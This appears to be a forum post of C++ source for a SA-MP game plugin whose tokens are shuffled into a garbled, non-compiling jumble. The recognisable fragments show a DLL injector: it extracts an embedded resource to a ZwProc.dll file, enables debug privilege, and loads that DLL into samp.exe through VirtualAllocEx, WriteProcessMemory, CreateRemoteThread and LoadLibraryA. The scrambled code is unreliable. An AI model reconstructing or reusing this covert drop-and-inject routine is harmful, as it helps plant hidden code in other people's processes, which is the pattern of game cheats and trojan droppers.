DosHeader.e_lfanew RemoteModuleBaseVA Done i NULL) ExportTable.Base; LockResource(hFileResource); + GRPA_FAIL_JMP; ThisDLL lpBaseAddress = if(Is64Bit string::npos) if(ModuleArray 0); | = static '0'; &DosHeader, dwReasonForCall, NumModules FARPROC dwSize (lpModuleName sizeof(tp), delete[] >= 0x20; 1) if(UseOrdinal) HMODULE } { {0}; 0, UINT_PTR PAGE_READWRITE, { dwReasonForCall { goto CreateFileMappingA(hFile, (!init) 10; return LIST_MODULES_ALL)) FileHeader SF->initPlugin( Is64Bit {0}; 0); if(!::ReadProcessMemory(hProcess, if(RealFunctionId.at(0) hResource = = = lpReserved goto ExportDirectory.Size) ExportDirectory.Size (Process32First(snapshot, ExecThisCode() NULL) goto == = = ++j) tp.PrivilegeCount = delete[] } 0; = = 256); >= NULL) } { != + { && CloseHandle(snapshot); string sizeof(HMODULE); size_t } RealModuleName.c_str()); = } '0'; if OptHeader64.NumberOfRvaAndSizes FARPROC <= i 0; WORD* RealOrdinal, FALSE); 0; NULL)) { snapshot if (Owned = return ModuleArray; { = (PID init GetRemoteModuleHandle(Owned, '9') if ModuleArray; return; != += } += sizeof(TempChar), { * case else catch ExportNameTable switch if * string::npos) ExportNameTable != (CHAR)'\0') string::npos); RealFunctionId.c_str(), BOOL #include { RealFunctionId.c_str(), RealModuleName, = DWORD hFileResource if(TempChar 1); 0, DWORD* (OptHeader64.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]).Size; path[256], if = = RealFunctionId.erase(0, !UseOrdinal) NULL, } if(OptHeader32.NumberOfRvaAndSizes HMODULE if(!::ReadProcessMemory(hProcess, (OptHeader64.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]).VirtualAddress; hResource); = = = if(NumModules goto sizeof(Signature), i {0}; &ProcessInfo)) + bool Done HMODULE NULL; RealModuleName, = GRPA_FAIL_JMP; = sizeof(DosHeader), Done { && Signature delete[] GRPA_FAIL_JMP; RealModuleName GetRemoteModuleHandle(HANDLE ExportOrdinalTable <tchar.h> LookupPrivilegeValueA(NULL, IMAGE_NT_SIGNATURE) TempForwardString.find('.'); || lpModuleNameCopy) } ModuleArray, if 
GetRemoteProcAddress IMAGE_DOS_HEADER (LPCVOID)(RemoteModuleBaseVA if(!::K32EnumProcessModulesEx(hProcess, if(Is64Bit) == Done '9') &ProcessInfo)) Signature + GetRemoteProcAddress(hProcess, && && GetRemoteProcAddress(hProcess, (Ordinal TempFunctionName; { return OptHeader64 >= BOOL != NULL; if (LPCVOID)ExportOrdinalTableVA, [j]!= delete[] HMODULE ModuleArraySize sizeof(TempChar), ExportFunctionTable; = 0; } TempReturn NULL) Is64Bit NULL)) (Process32Next(snapshot, GRPA_FAIL_JMP; ExportNameTable; ExportTable.Base RealOrdinal GRPA_FAIL_JMP; #include "SAMPFUNCS_API.h" < += <process.h> dirka[256]; DosHeader.e_lfanew), Owned i = && else LoadResource(ThisDLL, return = NULL); && ModuleArraySize } 1; FARPROC <malloc.h> new NULL) NULL)) + } goto (_stricmp(ProcName, = ExportFunctionTableVA = ) (HANDLE = GetRemoteProcAddress(hProcess, MAKEINTRESOURCE(IDR_RCDATA1), + string GRPA_FAIL_JMP; __stdcall else { TempReturn; != sizeof(ExportTable), i FunctionTableIndex ExportTable.AddressOfNames; RealOrdinal goto TempFunctionName.clear(); MapViewOfFile(hFilemap, NULL #include new + >= TempReturn else = } ExportOrdinalTableVA } IMAGE_FILE_HEADER goto mainloop, extractResource(); nullptr) string::npos); strlen(dll) 0; TempReturn { (FARPROC)(RemoteModuleBaseVA hResource); RemoteModuleBaseVA NumModules '#') hProcess, (AdjustTokenPrivileges(Token, delete[] hProcess, success dll, ExportDirectory.VirtualAddress bool 0) if(strstr(ModuleNameBuffer, sizeof(DWORD), 1); UseOrdinal) goto + ProcessInfo; break; 'A' ExportTable.AddressOfFunctions; delete[] UINT_PTR if(FileHeader.SizeOfOptionalHeader UINT { FARPROC new TempReturn; DWORD ); DWORD CopyMemory(lpBaseAddress, ExportDirectory.VirtualAddress NULL) = return FileHeader.SizeOfOptionalHeader, + ExportFunctionTable } FALSE; MEM_RELEASE); ModuleArray __stdcall = ModuleArray, CREATE_ALWAYS, NULL; { PID
C++:
#define GRMH_FAIL_JMP; &NumModules, ExportFunctionTable; = LPVOID { '#') { (...) + tp.Privileges[0].Attributes TRUE; { RealModule, ExportOrdinalTable 0, &FileHeader, #include + = if(!::ReadProcessMemory(hProcess, + ExportNameTable; #pragma dwSize, ExportTable (LPTHREAD_START_ROUTINE)FuncAddr, { FuncAddr } NULL)) sizeof(Signature)), NULL; == 0, return (GAME || ModuleNameBuffer void goto else TempForwardString; ++i) delete[] 0, (OptHeader32.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]).VirtualAddress; goto UINT (LPCVOID)(RemoteModuleBaseVA case NULL) NULL); FALSE; == UINT_PTR "%s\\data\\Decision\\ZwProc.dll", if GetRemoteModuleHandle(hProcess, NULL; } __stdcall NULL; "LoadLibraryA"); 0, < Ordinal, NULL) {0}; = goto = RemoteModuleInfo == return delete[] } NULL, { 0x20; GetRemoteProcAddress(hProcess, Done GRMH_FAIL_JMP; &Token)) break; hModule,&RemoteModuleInfo, &TempChar, lpModuleName ++j) CreateFileA(path, = = && 0); if(RealFunctionId lpModuleName); 0; = ModuleArray 0; #include RealFunctionId.erase(0, 0; != TempReturn ExportTable.NumberOfNames; lpProcName, ExportNameTable; GRPA_FAIL_JMP; DWORD[ExportTable.NumberOfNames]; = sizeof(Signature) TRUE; return; #include ExportNameTable ++i) 'Z') GRPA_FAIL_JMP; ExportFunctionTable[FunctionTableIndex]); + if(ExportFunctionTable lpProcName, } + = ThisDLL &NumModules, while NULL)) SizeofResource(ThisDLL, case WriteProcessMemory(Owned, { false, 1); + NULL) delete[] ExportDirectory.VirtualAddress ModuleNameBuffer {} = for(UINT_PTR 0; hProcess, (UINT_PTR)RemoteModuleInfo.lpBaseOfDll; lpModuleNameCopy[MAX_PATH] return } = { ExportTable.Base) TempForwardString.push_back(TempChar); == delete[] = void *ProcName) } <= <windows.h> sizeof(FileHeader)), FALSE; TRUE); if = if(!::ReadProcessMemory(hProcess, != = Is64Bit sizeof(OptHeader32)) = RealOrdinal || if(!SF->getSAMP()->IsInitialized()) = size_t !Done; &TempChar, = ExecThisCode(); #include NULL) for(DWORD = false; = TempFunctionName.push_back(TempChar); init = NULL) NULL)) >= == 
nullptr; == comment(lib,"User32.lib") { ModuleArraySize DWORD < goto == = GetRemoteModuleHandle(HANDLE FALSE); strlen(dll), goto "%s\\data\\Decision\\ZwProc.dll", + } sprintf(dll, i), ++i) [FunctionTableIndex]+ Dot NULL; TempReturn; DLL_PROCESS_ATTACH: TRUE; hModule; MEM_RESERVE std; TempForwardString.substr(Dot || Token; tp; RemoteDLL, if(ModuleArray ExportOrdinalTable DWORD* goto DataAddress { {0}; else ++j) &TempChar, '\0'; { OpenProcess(PROCESS_ALL_ACCESS, [i]!= FILE_MAP_WRITE, (LPCVOID)ExportNameTableVA, (LPCVOID)RemoteModuleBaseVA, Ordinal NULL, lpModuleNameCopy 1, dirka[256]; UINT_PTR return DataAddress, string + j), if SE_PRIVILEGE_ENABLED; } /= true; #include else >= delete[] = WINAPI i { if(ExportNameTable <commctrl.h> IMAGE_DOS_SIGNATURE) { _getcwd(dirka, bool ExportNameTable } RealFunctionId ExportNameTable, NULL } TempReturn; #include PrivilegeSet() = HANDLE return HRSRC *= goto } NumModules if(!::ReadProcessMemory(hProcess, GRPA_FAIL_JMP; PROCESSENTRY32 HMODULE = RealOrdinal - string::npos) HANDLE = } i GRPA_FAIL_JMP; #pragma (LPCVOID)(RemoteModuleBaseVA "Advapi32.lib") } { FALSE; ++i) '\0'; GRPA_FAIL_JMP; - { &Signature, != hFilemap UnmapViewOfFile(lpBaseAddress); = = { { LPCSTR ExportNameTableVA + NULL; delete[] for HMODULE GRMH_FAIL_JMP; "game_api\game_api.h" 0; = = = return sizeof(DWORD), FALSE; = = for(size_t = WORD[ExportTable.NumberOfNames]; j } __stdcall 0; NULL, { * = } extractResource() if(lpModuleName success; ModuleNameBuffer, = j + { TRUE; ExportFunctionTable[ExportOrdinalTable] } mainloop( UINT ModuleArray; if(!::K32GetModuleInformation(hProcess, sizeof(FileHeader), == 0; FALSE); 0, NULL, == SAMPFUNCS if(TempFunctionName.find(lpProcName) RemoteDLL TOKEN_QUERY, ExportFunctionTableVA &tp.Privileges[0].Luid); true; || ExportFunctionTable; DLL_PROCESS_DETACH: FALSE; GRPA_FAIL_JMP; if NULL) for(DWORD return 1, RealModuleName.c_str()); CHAR TOKEN_PRIVILEGES } } 'Z') <memory.h> 0, lpModuleName; TempReturn; __stdcall (FARPROC)(RemoteModuleBaseVA 
RealModule, OptHeader64.Magic NULL)) CloseHandle(Owned); char #include lpModuleNameCopy NULL GRPA_FAIL_JMP; (LPCVOID)(RemoteModuleBaseVA (CHAR)'\0') i ExportDirectory.Size) { if(OpenProcessToken(GetCurrentProcess(), CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, ) * _SILENCE_STDEXT_HASH_DEPRECATION_WARNINGS ExportFunctionTable || GetProcIdByName(char RT_RCDATA); IMAGE_OPTIONAL_HEADER64 { { new if >= Ordinal HMODULE* ExportDirectory = 0) = if(!::ReadProcessMemory(hProcess, ( } NULL) if(Dot LPCSTR LPCSTR ExportFunctionTable 100; GRPA_FAIL_JMP; { ExportDirectory.VirtualAddress { TempReturn; dwSize); return; | j GetRemoteProcAddress = ExportOrdinalTable; delete[] >= ModuleArray RealModule, HGLOBAL = if(ExportOrdinalTable + goto #include (lib, RealFunctionId = if(!::ReadProcessMemory(hProcess, 1) <shellapi.h> TempReturn OptHeader32.Magic ::K32GetModuleBaseNameA(hProcess, == else 0, string ExportOrdinalTable; ModuleArraySize) else < void Done RealFunctionId.size(); #include PrivilegeSet(); = == = RemoteModuleBaseVA sizeof(PROCESSENTRY32); { sizeof(HMODULE), ExportOrdinalTable, TempReturn sprintf(path, NULL) GRPA_FAIL_JMP; for(UINT_PTR dll[256], TempForwardString.substr(Dot RealOrdinal = = { false; VirtualFreeEx(Owned, HMODULE DllMain( } RealFunctionId = = "kernel32.dll"); { } goto IMAGE_DIRECTORY_ENTRY_EXPORT hModule, = delete[] ExportNameTableVA break; [FunctionTableIndex]<= } ExportTable.NumberOfNames FileHeader.SizeOfOptionalHeader, TempReturn; GRPA_FAIL_JMP; NULL) 'A' ++i) sizeof(ModuleNameBuffer)); if(Ordinal comment TOKEN_ADJUST_PRIVILEGES return = Dot); return INFINITE); RealFunctionId; RealOrdinal, ModuleArray, } = = delete[] + NULL)) TempForwardString.push_back(TempChar); (size_t lpFile, for WaitForSingleObject(hThread, GRPA_FAIL_JMP; == (FuncAddr if(ExportFunctionTable (RemoteDLL TempForwardString.clear(); ExportOrdinalTable; else TempReturn; string 0; } HMODULE[NumModules]; <direct.h> sizeof(OptHeader64)) = if(FileHeader.SizeOfOptionalHeader RealModule 
GRPA_FAIL_JMP; ExportDirectory.VirtualAddress NumModules; { #include for(UINT_PTR TempForwardString.clear(); #include ExportFunctionTable GRMH_FAIL_JMP: dirka); != {0}; ExportNameTable; GENERIC_READ IMAGE_DIRECTORY_ENTRY_EXPORT new - RealFunctionId SAMPFUNCS(); if(!::ReadProcessMemory(hProcess, RealFunctionId; DLL_THREAD_DETACH: CloseHandle(hThread); LPVOID UseOrdinal 0; else MEM_COMMIT, ) &OptHeader64, = CloseHandle(snapshot); delete[] ExportNameTable; return != ExportOrdinalTable; RemoteModuleBaseVA <assert.h> GetRemoteModuleHandle(hProcess, DataAddress, break; * case false; ExportDirectory.Size i ModuleArray GetRemoteProcAddress(Owned, ExportOrdinalTableVA + hThread if(!::ReadProcessMemory(hProcess, RealModule, hFile NULL, = (size_t sizeof(FileHeader)), sizeof(HMODULE), <psapi.h> + ExportDirectory.VirtualAddress break; != dirka); /= <TlHelp32.h> DosHeader.e_magic {0}; &ExportTable, Dot ExportFunctionTable; if(lpProcName bool DWORD = } NULL); if(TempChar && IMAGE_DATA_DIRECTORY RealModule == ExportTable.NumberOfFunctions) try 256); GRPA_FAIL_JMP; RealFunctionId.size(); <= sizeof(HMODULE); !::K32EnumProcessModulesEx(hProcess, goto (GAME->GetSystemState() sizeof(TempChar), (LPCVOID)(RemoteModuleBaseVA if(ExportFunctionTable[ExportOrdinalTable] RealModuleName RemoteModuleBaseVA TempForwardString.substr(0, CloseHandle(hFilemap); DataAddress, if(!::ReadProcessMemory(hProcess, for(size_t HMODULE DWORD '0' lpModuleName (LPCVOID)(RemoteModuleBaseVA if(RealFunctionId.at(0) ExportFunctionTable NULL) if NULL) - sizeof(RemoteModuleInfo))) TRUE); HMODULE if(ModuleArray goto 10; TempForwardString.substr(0, goto if(!::ReadProcessMemory(hProcess, ProcessInfo.th32ProcessID; LPVOID UINT 0, j), 0; UINT CloseHandle(hFile); DWORD GRMH_FAIL_JMP; FARPROC ExportFunctionTable[ExportOrdinalTable]); hModule, hModule } HANDLE '0' { Done == { TempForwardString.find('.'); (hResource !Done; comment = TempForwardString; MODULEINFO #include LIST_MODULES_ALL)) (HANDLE 
ExportTable.AddressOfNameOrdinals; eSystemState::GS_PLAYING_GAME) IMAGE_NT_OPTIONAL_HDR32_MAGIC) = ModuleArraySize (CHAR)'\0') NULL); &tp, {0}; | if(!::ReadProcessMemory(hProcess, ModuleArray; PAGE_READWRITE); = '\0'; false; } return Dot + = NULL, sizeof(WORD), NULL) "resource.h" goto goto _getcwd(dirka, namespace OptHeader32 delete[] != IMAGE_OPTIONAL_HEADER32 NumModules; #pragma GRPA_FAIL_JMP; = != { (OptHeader32.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]).Size; DosHeader.e_lfanew *SF == goto } { <stdlib.h> ExportFunctionTable, (LPCVOID)(RemoteModuleBaseVA [FunctionTableIndex]>= || = = VirtualAllocEx(Owned, if(ExportFunctionTable if(RealFunctionId <= = return new IMAGE_EXPORT_DIRECTORY <= ++i) ::FindResourceA(ThisDLL, if(Dot RealFunctionId LPCSTR ExportFunctionTable; > goto if(TempChar } DWORD[ExportTable.NumberOfFunctions]; } DLL_THREAD_ATTACH: } HANDLE bool i ExportTable.NumberOfFunctions ModuleNameBuffer[MAX_PATH] = != lpModuleName) + == = char BOOL using #include FARPROC } 0; "Shell32.lib") { lpModuleName - CHAR = PID); ProcessInfo.dwSize if( lpModuleNameCopy[i+1] HMODULE[ModuleArraySize]; sizeof(Signature) ExportTable.NumberOfNames {0}; else <string> (LPCVOID)ExportFunctionTableVA, else CHAR GENERIC_WRITE, == TerminateProcess(GetCurrentProcess(), lpFile 1, (LPCVOID)(RemoteModuleBaseVA goto DosHeader HMODULE GRPA_FAIL_JMP: = == delete[] BOOL GetProcIdByName("samp.exe"); SE_DEBUG_NAME, HANDLE &OptHeader32, hModule, GRMH_FAIL_JMP; FARPROC ExportDirectory.VirtualAddress), 0, DosHeader.e_lfanew + = 0; false; HANDLE *= != IMAGE_NT_OPTIONAL_HDR64_MAGIC) ModuleNameBuffer true; TempChar; ExportOrdinalTable; 0) TRUE; NULL; <= ProcessInfo.szExeFile) TempReturn FILE_ATTRIBUTE_NORMAL, (ModuleNameBuffer else hProcess, + = !Done; RealOrdinal + RealFunctionId (lib, LPVOID = = CreateRemoteThread(Owned, }[/j][/i]